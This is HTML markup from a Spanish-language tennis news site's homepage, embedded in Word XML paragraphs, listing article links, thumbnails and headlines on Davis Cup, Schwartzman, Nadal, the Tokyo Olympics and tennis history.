    <w:p w14:paraId="023DCB7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&lt;/div&gt;&lt;!--mvp-feat1-main--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B47B3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&lt;/div&gt;&lt;!--mvp-feat1-right-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7A9A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class="mvp-feat1-right-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6521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class="mvp-feat1-list-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA42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class="mvp-feat1-list-head-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599624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&lt;ul class="mvp-feat1-list-buts left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B822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&lt;li class="mvp-feat-col-tab"&gt;&lt;a href="#mvp-feat-tab-col1"&gt;&lt;span class="mvp-feat1-list-but"&gt;Lo Ãºltimo &lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799CD58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&lt;li&gt;&lt;a href="#mvp-feat-tab-col2"&gt;&lt;span class="mvp-feat1-list-but"&gt;Videos&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8813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&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11413D6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&lt;/div&gt;&lt;!--mvp-feat1-list-head-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD2A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id="mvp-feat-tab-col1" class="mvp-feat1-list left relative mvp-tab-col-cont"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B63B6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href="http://todosobretenis.com/dura-derrota-de-schwartzman-y-contundente-victoria-de-pella-ante-bielorrusia/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1223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11E234D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2E12087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04DB16A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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-150x150.jpeg 150w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-300x300.jpeg 300w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-768x768.jpeg 768w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft-1024x1024.jpeg 1024w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lZBe6XEAYsrft.jpeg 1080w"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64007C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01C37B6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4362436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BC0EB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3282A0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56E1588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&lt;h2&gt;Dura derrota de Schwartzman y contundente victoria de Pella ante Bielorrusia&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F561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4D6793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199307E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38A2A6F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52EC5C9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50A83D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href="http://todosobretenis.com/schwartzman-estaba-en-un-dia-en-el-que-nada-iba-a-salir/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E110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251F0A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32D1D23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367A6FF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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_lATwuXIAA_kZV-150x150.jpeg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1226CE8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75CD921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6A6A6B0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0F98A9F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6EBD019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63F37CD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&lt;h2&gt;Schwartzman: &amp;#8220;&amp;#8221;Estaba en un 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 en el que nada iba a salir&amp;#8221;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08FC6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66C6D88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756D6AD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01A9867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5F9939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4514FF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href="http://todosobretenis.com/argentina-vs-bielorrusia-marcaria-la-despedida-de-gaston-gaudio/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E755B2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47367EE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10AFED7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4835BD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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_hgW06XsAA9csf-150x150.jpeg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50C23D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46C9AB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41D3986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D89793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4DFBDA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51F61D2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&lt;h2&gt;Argentina vs Bielorrusia marcarÃ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 la despedida de GastÃ³n Gaudio&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C9071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6021870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0145B53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6A45D61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1434469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3485FB2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href="http://todosobretenis.com/el-camino-de-argentina-a-las-finales-de-madrid-2022/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13010C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2A4DD0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06366DD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711F86A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src="http://todosobretenis.com/wp-content/uploads/2020/03/ESWxn4wXYAA9TEf-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/ESWxn4wXYAA9TEf-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/ESWxn4wXYAA9TEf-150x150.jpeg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617D701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2441D77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0CF45B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155BCBB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7DA2B53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660F16B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&lt;h2&gt;El camino de Argentina a las finales de Madrid 2022&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE717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1B725D5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0D72B9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0533072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11A59F8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9E5173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href="http://todosobretenis.com/schwartzman-abrira-la-serie-ante-bielorrusia/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B977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5A21726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502F89B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4AC28A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src="http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-17-at-11.35.10-AM-150x150.jpeg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2448D8C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19B0F0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33FBF7A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4585F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D4E63C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335579B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&lt;h2&gt;Schwartzman abrirÃ¡ la serie de Copa Davis ante Bielorrusia&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712C425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49F904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712F867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47471BE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0E06A3F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FCD314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href="http://todosobretenis.com/un-total-de-10-paises-buscan-la-clasificacion-a-los-qualifiers-de-la-copa-davis/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE7E52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744FE9A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38C2B01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1FEB0E4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src="http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/E_Vqh63XMAkUF3Z-150x150.jpeg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1790313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11BC8F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09DBF12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5BE882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relative"&gt;Copa Davis&lt;/span&gt;&lt;span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097B3C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57DE3A3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&lt;h2&gt;Un total de 10 paÃ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ses buscan la clasificaciÃ³n a los Qualifiers de la Copa Davis&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C97E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780BD0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785D0E2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24F456B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4CAF8A0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054E85A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href="http://todosobretenis.com/un-siglo-de-tenis-la-aat-cumple-100-anos-y-lo-celebra-junto-a-los-clubes/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30696A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5738B09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34DC43B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011D89D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src="http://todosobretenis.com/wp-content/uploads/2021/09/rc_2457-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/09/rc_2457-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/09/rc_2457-150x150.jpeg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653C9FF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61D2AC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6A28701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C6121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relative"&gt;Noticias&lt;/span&gt;&lt;span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53E1C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5ACCFC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&lt;h2&gt;Un siglo de tenis: la AAT cumple 100 aÃ±os y lo celebra junto a los clubes&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F95C5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6D583B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6CDEBD4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380F95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48DE617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64EE80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href="http://todosobretenis.com/harris-obtiene-la-mejor-victoria-de-su-carrera/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C292D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02BB3F5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647881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7E1A855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src="http://todosobretenis.com/wp-content/uploads/2021/08/harris-washington-2021-thursday-2-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/08/harris-washington-2021-thursday-2-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/harris-washington-2021-thursday-2-150x150.jpeg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5A79BF0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0BA275B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728BB9B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7560641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relative"&gt;ATP 500&lt;/span&gt;&lt;span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0DECB2A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C8D901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&lt;h2&gt;Harris obtiene el mejor triunfo de su carrera&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDDF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73C4E85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64127A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33F4FD9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58B17FC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C8064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href="http://todosobretenis.com/victoria-sufrida-de-nadal-en-su-vuelta-a-la-actividad/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A95AA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0006BA1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1D1ECC6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4193FAB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src="http://todosobretenis.com/wp-content/uploads/2021/08/E7_OHOaUcAApC84-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/08/E7_OHOaUcAApC84-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/E7_OHOaUcAApC84-150x150.jpeg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6505EC2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2F42BFA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2EBE8DA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F4D3DC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relative"&gt;ATP 500&lt;/span&gt;&lt;span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3147A34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450C10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&lt;h2&gt;Victoria sufrida de Nadal en su vuelta a la actividad&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909ED4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1CE09E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702A89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2AD970B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72C551E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6E4D53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href="http://todosobretenis.com/nadal-retorna-al-circuito-frente-a-jack-sock/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D3F92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5609BE5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4ED79E1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40D7CE3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src="http://todosobretenis.com/wp-content/uploads/2021/08/r890374_1024x576_16-9-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/08/r890374_1024x576_16-9-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/r890374_1024x576_16-9-150x150.jpeg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320DE36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59D8AED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68B86D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064FDFA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relative"&gt;ATP 500&lt;/span&gt;&lt;span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414458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616F91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&lt;h2&gt;Nadal retorna al circuito frente a Jack Sock&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FBC8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75CF7B2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33B45C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2945438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613D225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015AF3D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href="http://todosobretenis.com/zverev-campeon-olimpico/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A4F1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52C8C4C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7B30E33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1D896E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src="http://todosobretenis.com/wp-content/uploads/2021/08/E7sqb8wX0AIgeTm-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/08/E7sqb8wX0AIgeTm-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/E7sqb8wX0AIgeTm-150x150.jpeg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3C61F7B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156872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630C0E4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08DCE1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relative"&gt;JJOO&lt;/span&gt;&lt;span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3B28C0B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577182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&lt;h2&gt;Â¡Zverev campeÃ³n olÃ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mpico!&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E790C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22A9E3A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6A8E805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77DD5B5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020545F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F59BAD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href="http://todosobretenis.com/carreno-busta-se-quedo-con-la-medalla-de-bronce/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5062C1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77B755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4F6940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13E951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src="http://todosobretenis.com/wp-content/uploads/2021/08/E7nQpB8XMAkm2Kk-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/08/E7nQpB8XMAkm2Kk-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/08/E7nQpB8XMAkm2Kk-150x150.jpeg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78F3C2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3A86BA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5D9E44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1BC9C46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relative"&gt;JJOO&lt;/span&gt;&lt;span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6806E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80D78C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&lt;h2&gt;CarreÃ±o Busta se quedÃ³ con la medalla de bronce&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF11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33B9F4E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7FF62F0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2277980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610F447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1C35F5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href="http://todosobretenis.com/djokovic-se-despidio-del-oro-e-ira-por-el-bronce-en-tokio/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2DE7C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7F2155D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3CE815A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2E9409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src="http://todosobretenis.com/wp-content/uploads/2021/07/95l4NVMq-80x80.jpeg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2021/07/95l4NVMq-80x80.jpeg 80w, http://todosobretenis.com/wp-content/uploads/2021/07/95l4NVMq-150x150.jpeg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004BBE8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74D906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44EC842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09789C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relative"&gt;JJOO&lt;/span&gt;&lt;span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08DE34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E53D2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&lt;h2&gt;Djokovic se despidiÃ³ del oro e irÃ¡ por el bronce en Tokio&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE720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1F5A261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6073A06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4EDEB3F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50ABDFC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CB5B51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&lt;/div&gt;&lt;!--mvp-feat-tab-col1--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0B8E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id="mvp-feat-tab-col2" class="mvp-feat1-list left relative mvp-tab-col-cont"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF23A7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href="http://todosobretenis.com/revivi-la-consagracion-de-londero-en-cordoba/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA3B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1897ED4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177560C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0D0F8D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src="http://todosobretenis.com/wp-content/uploads/2019/02/topo-1-80x80.jpg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/02/topo-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/02/topo-1-150x150.jpg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28AC0A2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6B0F465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4409C02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51DAED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relative"&gt;Cordoba&lt;/span&gt;&lt;span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EC99F6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37F469A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&lt;h2&gt;Revivi la consagraciÃ³n de Londero en Cordoba&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36866A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5DA84FF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1D1030E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113047D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0441A3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51C0B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href="http://todosobretenis.com/delpo-a-puertas-abiertas-en-tandil/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF2C1A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1EFD44A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753F415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16BA607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src="http://todosobretenis.com/wp-content/uploads/2019/02/hoy-80x80.jpg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/02/hoy-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/02/hoy-150x150.jpg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0712FE5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7EB2F11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31D7073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13DCF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relative"&gt;Y algo mÃ¡s&lt;/span&gt;&lt;span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5B45DD5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24A1B5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&lt;h2&gt;Delpo a puertas abiertas en Tandil&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1006C6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6F0547D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38A0F03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112D7A2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18B3044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6B7EBC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href="http://todosobretenis.com/highlight-novak-djokovic-vs-rafael-nadal/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD6F9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620F9B9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0BD1140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6EFA030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src="http://todosobretenis.com/wp-content/uploads/2019/01/novak-1-80x80.jpg" class="attachment-mvp-small-thumb size-mvp-small-thumb wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/01/novak-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/01/novak-1-150x150.jpg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0853A72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0C41054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357504E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54B13D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relative"&gt;Australian Open&lt;/span&gt;&lt;span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0C46440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EAD921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&lt;h2&gt;Highlight: Novak Djokovic vs Rafael Nadal&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA87B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6BC598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16728DD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43B910C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2DC4A22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B8E0E3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href="http://todosobretenis.com/ladob-la-villa-olimpica-la-juventud/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C4D9A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71DDDA6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6711080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136E91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13DC05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7ADEB4A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4CC5E4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ED54D0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relative"&gt;Juegos OlÃ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mpicos de la Juventud&lt;/span&gt;&lt;span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37F999B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D8B62A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&lt;h2&gt;El #LadoB de la Villa Olimpica de la Juventud&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675400E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1CB350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262F626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02DEB70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352138F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5692AA3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href="http://todosobretenis.com/la-celebracion-delpo-vestuario/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53987B4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1BBD822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50379AB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00382CD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061BED7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7872007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4889B93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692C1E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relative"&gt;Indian Wells&lt;/span&gt;&lt;span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72595B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67EE067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&lt;h2&gt;La celebraciÃ³n de Delpo en el vestuario&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AF3C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54E6C60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3447BE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3F728A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2833F13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BB9075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href="http://todosobretenis.com/papelon-del-alcalde-quito-ecuador-open/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345AADC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15CA89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160CF97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0ACBFA8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4E56661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6396FC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3251A44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0117C17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relative"&gt;Quito&lt;/span&gt;&lt;span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07658FE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5E4E680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&lt;h2&gt;El papelÃ³n del alcalde de Quito en el Ecuador Open&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FAF64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36C7F13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2F7EA86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290E297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1F58A13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62E0B5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href="http://todosobretenis.com/punto-la-victoria/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76815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104DCEC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1402D47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4B9E35E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0F86696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3286A51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7278CCF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1F5CA0A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relative"&gt;Australian Open&lt;/span&gt;&lt;span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3F8C47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039B928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&lt;h2&gt;El punto de la victoria&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025239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27752D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5570E1E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669739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52933F5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75F253C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href="http://todosobretenis.com/los-1000-de-roger/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84212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23F9A42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3B1C0A5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3DC4B9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3F0FB7F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5911FCE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221F6F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AF5FBB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relative"&gt;Multimedia&lt;/span&gt;&lt;span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39C7131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5354C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&lt;h2&gt;Los 1000 de RogerÂ &lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B551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2F17613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2EF9D3C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413D32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63D5E28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F60AB3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href="http://todosobretenis.com/el-punto-que-hizo-historia/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A942F3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01E46EE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3380766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624B345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7A25010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78A4F4D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6B525F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23531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relative"&gt;Multimedia&lt;/span&gt;&lt;span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5DB311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39C0AEF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&lt;h2&gt;El punto que hizo historia&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004FA3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4A01056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2439E57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5C24C8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0A3CAC2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54A5F4C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href="http://todosobretenis.com/que-hizo-federer-antes-de-jugar-las-semis-de-wimbledon/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DACDD4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6BB2865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3AD9DBB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52CF5A1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77C0174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1F4A8A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09B09D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79A165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relative"&gt;Multimedia&lt;/span&gt;&lt;span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4D59320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1E0DF2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&lt;h2&gt;Â¿Que hizo Federer antes de jugar las semis de Wimbledon?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDC63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090B01B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064E282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7F67CD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4C36B26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966F3D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href="http://todosobretenis.com/djokovic-y-agassi-entrenan-juntos-por-primera-vez/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA5FB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53B294D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05040D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0787308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685DB85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6E766AE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4FF0E73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7E29F5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relative"&gt;Multimedia&lt;/span&gt;&lt;span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7C06AFB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78F7E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&lt;h2&gt;Djokovic y Agassi entrenan juntos por primera vez&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47064C8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57B1BFF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591F1F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1A0A71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1DBE041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DB0E9E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href="http://todosobretenis.com/23051-2/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27096E0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2FCEBDB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2951C22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4092C28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593DF6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392992C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0AF10F0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CD92EA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relative"&gt;Multimedia&lt;/span&gt;&lt;span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2DF39E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18BCEAB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&lt;h2&gt;Los vestuarios del Masters 1000 de Madrid por dentro&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286721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1AD3818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3F1CA8C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4982BA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374C9C0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10ABF1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href="http://todosobretenis.com/zeballos-luego-de-perder-le-pidio-una-selfie-a-nadal/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64529E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5086C68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5D7BB09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6D317DF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1EBB78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1919101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718B906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122FD34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relative"&gt;Marketing&lt;/span&gt;&lt;span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4FC826A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C7EA2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&lt;h2&gt;Zeballos luego de perder le pidiÃ³ una selfie a Nadal&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DB0B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26B1736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00A4701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3F6BDA2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279CB07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412A56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&lt;/div&gt;&lt;!--mvp-feat-tab-col2--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105243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id="mvp-feat-tab-col3" class="mvp-feat1-list left relative mvp-tab-col-cont"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02FD6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&lt;/div&gt;&lt;!--mvp-feat-tab-col3--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C0637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&lt;/div&gt;&lt;!--mvp-feat1-list-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB56AA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&lt;/div&gt;&lt;!--mvp-feat1-right-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA7E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&lt;/div&gt;&lt;!--mvp-feat1-right-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C747BF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&lt;/section&gt;&lt;!--mvp-feat1-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC507E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&lt;/div&gt;&lt;!--mvp-main-box--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CCF9D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id="mvp-home-widget-wrap" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72998D8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&lt;section id="mvp_flex_widget-11" class="mvp-widget-home left relative mvp_flex_widget"&gt;&lt;div class="mvp-main-box"&gt;&lt;div class="mvp-widget-home-head"&gt;&lt;h4 class="mvp-widget-home-title"&gt;&lt;span class="mvp-widget-home-title"&gt;Para pasar el rato&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7B8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class="mvp-widget-flex-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2916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class="mvp-flex-story-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38513F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href="http://todosobretenis.com/el-sunshine-double-una-prueba-exigente/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200DB4A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48D8FA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472065F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0F584B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src="http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-150x150.jpg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25F0FF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299512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56ED3E8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685110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9EBB5D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02AB4FE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class="mvp-stand-title"&gt;El â€œSunshine Doubleâ€, una prueba exigente&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124E1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&lt;p&gt;En 35 aÃ±os, solo siete jugadores lo han logrado.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF6641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4D6B8EA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324DBA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6B03FB2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12C7C9B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59309C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href="http://todosobretenis.com/por-que-son-tan-importantes-los-antivibradores-en-las-raquetas/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EB51B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12AAB05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393B27A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2D6C56A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src="http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-150x150.jpg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304444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45F50B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64D5BBA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768D25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FD42C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9B0D3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class="mvp-stand-title"&gt;Â¿Por quÃ© son tan importantes los antivibradores en las raquetas?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EA0B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&lt;p&gt;En la actualidad son utilizados por la mayorÃ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 de los jugadores.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387C53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0AA5FF9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1D4AFC3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60BA212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5F96628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74DD57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href="http://todosobretenis.com/el-tragico-hamburgo-de-monica-seles/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70021D1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1C2257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6C8809A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39E77A4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src="http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-150x150.jpg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0049CBC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2A1B8C0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7DD7B03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69168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374537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0B2317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class="mvp-stand-title"&gt;El trÃ¡gico Hamburgo de MÃ³nica Seles&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1FFE5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&lt;p&gt;El recordado y bochornoso suceso que le puso un freno a la carrera de la serbia.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D293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4BD32C7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7F5E03B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54C12A3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117D7CB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62722B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href="http://todosobretenis.com/moqueta-la-superficie-abandonada/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766ADDC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7CCC0B3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3AD62B3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545DEA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src="http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-150x150.jpg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247AE96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1A582A1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4353BE3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7EB572E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207400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3B30E4B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class="mvp-stand-title"&gt;Moqueta, la superficie abandonada&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC286C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&lt;p&gt;Muy utilizada en las pistas indoor, fue prohibida en 2009.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
